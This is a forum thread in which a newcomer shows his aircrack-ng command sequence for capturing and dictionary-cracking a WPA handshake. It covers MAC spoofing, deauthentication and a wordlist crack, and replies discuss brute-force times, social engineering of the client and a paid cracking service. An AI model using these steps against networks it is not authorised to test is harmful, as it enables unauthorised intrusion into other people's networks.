Results 1 to 9 of 9

Thread: Passphrase not in dictionary???!?!?

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    Default Passphrase not in dictionary???!?!?

    Hey.

    I'm a newbie, just spent a lot of hours trying to hack a wireless network. I'm using a BackTrack 4 iso live cd to boot in BackTrack 4. I've spent a lot of hours to read a lot of "how to" guides, and I finally figured out how to do it. But when aircrack startet to "hack" the password, it just said "Passphare not in dictionary" after it tested 270 keys.

    This is what i do:
    airmon-ng stop wlan0
    ifconfig wlan0 down
    macchanger --mac 00:11:22:33:44:55 wlan0
    airmon-ng start wlan0
    airodump-ng wlan0

    # then i choose a taget (channel, bssid, essid) #

    airodump-ng -c 11 -w wpa -bssid 00:26:18:90:1D:4D wlan0

    # then i open another shell #

    aireplay-ng -0 5 -a 00:26:18:90:1D:4D wlan0

    # then i get a WPA handshake #

    aircrack-ng wpa-01.cap -w /pentest/wireless/aircrack-ng/test/password.lst

    then aircrack starts propper, i think, and tests about 270 keys in less than 1 sec, and then it says: Passphrase not i dictionary quitting aircrack

    What do i have to do?

    Rasmus

  2. #2
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    Default ..

    Okay, now i found a password list with about 1 million passwords, and the aircrack ran for about 3 hours, but still didn't find the key? Is it possible to find a WPA key ???

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    Default hmm..

    Okay, i kinda get the whole thing now..! The password list that comes with the backtrack live cd is just kinda "test" list, a really short one. I found some lists with more than 10 millions different combination, but that doesn't make any sense? It will take days, maybe even weeks for aircrack to test all the words - and that's no guarantee for finding the right one... And the lists only got proper words, not keys like: a5Gi877KgP1gH3 <- something like that. There have to be an easier way to crack a WPA, maybe something to do with the WPA-handshake or some kinda program that tries every possibly combination from 8-63 letters, both lower case, higher case, numbers and what else possible for a password to have in it. Can somebody help my out here?

  4. #4
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    Default

    You can try a generator to narrow down your combinations, run the cracker for days, or think of some other way to get the client to give you the password...
    Use your imagination!

  5. #5
    Senior Member streaker69's Avatar
    Join Date
    Jan 2010
    Location
    Virginville, BlueBall, Bird In Hand, Intercourse, Paradise, PA
    Posts
    3,535

    Default

    Quote Originally Posted by rallianto View Post
    Okay, i kinda get the whole thing now..! The password list that comes with the backtrack live cd is just kinda "test" list, a really short one. I found some lists with more than 10 millions different combination, but that doesn't make any sense? It will take days, maybe even weeks for aircrack to test all the words - and that's no guarantee for finding the right one... And the lists only got proper words, not keys like: a5Gi877KgP1gH3 <- something like that. There have to be an easier way to crack a WPA, maybe something to do with the WPA-handshake or some kinda program that tries every possibly combination from 8-63 letters, both lower case, higher case, numbers and what else possible for a password to have in it. Can somebody help my out here?
    Did you try putting the correct passphrase in your list?
    A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.

  6. #6
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    3

    Default

    I have the same problem. I have a handshake, tried 3 dictionaries, 2x <10 million entries, one big 60 million. Still no result.Here in my country we speak Bulgarian. So it is possible that the pass is something not in English, and the lists are generally for English. I will try a test with numbers only, but I will take a long time.


    If you want to try all the possibilities you will need around....few billion years.
    My computer tries 1500pass/sec. It has core 2 duo 3.00GHz Intel. But with my cuda enabled nvidia 9600GT i can go for up to 3100 passwords/s only with it.
    So overall I reach ~4K. But there are many many many combinations.
    Even with the cuda the computer spent 5 hours for the large list.
    To try each numeric combination with 8 digits (100 000 000) my PC will need 7 hours. With 9 digits, 70. With 10-700 hours!!!
    With letters it is even harder. I will need 21 monts only for 8 digits.
    And for "only" 20 i will need....160173521855785540 years. Even if you get 4 monster video cards you have no chance....yet.
    Here is one time calculator. lastbit.com/jscalc.asp

  7. #7
    Member
    Join Date
    Mar 2010
    Location
    /dev/null
    Posts
    455

    Default

    Quote Originally Posted by rallianto View Post
    I found some lists with more than 10 millions different combination, but that doesn't make any sense? It will take days, maybe even weeks for aircrack to test all the words - and that's no guarantee for finding the right one...
    Rather years I'd say... That's why WPA is still considered to be safe... If you want something faster, look under your AP box or set the security "level" to WEP...

  8. #8
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Not one part is a bug or a fix.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  9. #9
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default

    Quote Originally Posted by ~LCF~ View Post
    Rather years I'd say... That's why WPA is still considered to be safe... If you want something faster, look under your AP box or set the security "level" to WEP...
    WPA, is not considered safe, atleast not by me, and im not talking about TBs of drive space, cracking clouds, fpga`s, server/gpu arrays, etc. WPA is useless now, to a smart little falsification attack taking 10-20 minutes. This being said, for the average auditor the best chance one has, is to use an online WPA auditing service.
    PureH@te runs pretty much the best online wpa audit available right now, save yourself the time, MONEY, and effort and use his service for a mere $10. Available here
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •